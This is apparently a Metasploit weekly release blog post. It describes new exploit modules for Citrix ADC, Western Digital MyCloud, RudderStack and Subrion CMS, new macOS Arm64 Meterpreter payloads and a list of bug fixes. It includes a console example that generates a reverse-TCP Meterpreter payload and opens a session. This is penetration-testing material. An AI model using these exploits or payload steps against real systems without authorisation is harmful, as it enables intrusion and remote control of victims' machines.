Last updated at Thu, 10 Aug 2023 21:19:25 GMT
Fly High in the Sky With This New Cloud Exploit!
This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!
OSX Meterpreter support for M1 and M2 devices
Thanks to the great work of usiegl00, Metasploit now has payload support for M1 and M2 (Arm64) devices. The payloads run natively, so the x64 Rosetta translation layer does not need to be installed on the target machine.
The new payloads are:
Example of generating a payload:
msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...
After executing the payload on the remote host, the session will open and can be interacted with:
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...
meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >
Metasploit takes to the road
Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.
- Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
- DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom
New module content (10)
Citrix ADC (NetScaler) Forms SSO Target RCE
Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Pull request: #18240 contributed by zeroSteiner
AttackerKB reference: CVE-2023-3519
Description: This adds an exploit for CVE-2023-3519, which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process, which runs as root.
Western Digital MyCloud unauthenticated command injection
Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Pull request: #18221 contributed by ErikWynter
AttackerKB reference: CVE-2018-17153
Description: This adds an exploit module for the authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate that the target is vulnerable by attempting to leverage the authentication bypass, followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.
Rudder Server SQLI Remote Code Execution
Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.
Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE
Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Pull request: #18211 contributed by ismaildawoodjee
AttackerKB reference: CVE-2018-19422
Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.
AWS Instance Connection
Description: This adds AWS instance connection sessions.
OSX AArch64 Payload Support
Description: Adds new support for multiple OSX AArch64 payloads:
osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.
Enhancements and features (4)
- #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
- #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the
- #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API
- #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.
Bugs fixed (6)
- #18203 from adfoster-r7 - Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
- #18209 from adfoster-r7 - This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
- #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
- #18238 from dwelch-r7 - Fixes an issue when setting PASS_FILE with scanner modules. Previously the first username in the USER_FILE would not be tested against any password in PASS_FILE; this is now fixed.
- #18243 from adfoster-r7 - This PR fixes an issue where an appscan import would fail due to an empty proof.
- #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).